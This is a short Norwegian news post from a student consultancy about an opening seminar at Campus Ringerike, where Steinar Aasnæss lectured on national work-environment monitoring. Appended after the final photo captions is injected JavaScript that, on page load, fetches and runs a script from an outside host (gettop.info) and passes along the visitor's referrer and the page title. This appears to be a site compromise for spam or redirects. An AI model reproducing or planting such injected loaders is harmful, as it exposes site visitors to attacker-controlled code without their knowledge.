Åpningsseminar med Steinar Aasnæss

Posted on Posted in Nyheter

SONY DSC

Kunnandi Consulting er i dag en bedrift hvor studentene ved Høgskolen i Buskerud og Vestfold kan knytte kunnskapen de får fra undervisning, til reelle arbeidsoppgaver i direkte kontakt med næringslivet. Vi ønsker å gjøre overgangen fra tilværelsen som student, til arbeidslivet, noe mykere. Det er noe vi er blitt gode på opp igjennom årene.

Kunnandi betyr kunnskap, og sammen med Ringerike Utvikling ønsker vi nå skape en ny mulighet for at studenter skal kunne knytte sin tillærte kunnskap opp mot næringslivet. Muligheten for å skaffe seg ideer til fremtidige bachelor- og masteroppgaver skal nå kunne vekkes til livet i profesjonelle omgivelser, og plantet av en engasjert foredragsholder. Det blir ulike temaer, ulike foredragsholdere, og ulike studieretninger som vil få sjansen til å tilknytte seg erfaring og kontakter.

Det blir og er et arrangement for deling. Deling av teorier og fremtidsplaner. Deling av synspunkter og meninger om temaet. Deling av et mulig fremtidig samarbeid. En plattform for alt og alle.

Vi har allerede gjennomført et arrangement. Her var det Steinar Aasnæss fra HBV som fikk æren av å holde det første foredraget i Smart-Starts flotte nye lokaler på Campus Ringerike. Det ble et innholdsrikt foredrag om ”nasjonal overvåking av arbeidsmiljø”. Det skapte interesse.

Denne omgang var temaet i stor grad relatert til IT-studenter og HR-studenter, men studenter fra både markedsføring og økonomi møtte opp. Tilstede fra lokalt næringsliv var Veiby og Bentzen, og Saga Servce. Også de synes temaet var interessant, og kom i kontakt med flere av de oppmøtte studentene.

Neste foredragsholder er allerede klar, og vi gleder oss til neste arrangement. Vi håper å se flere interesserte!

SONY DSC SONY DSC}var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);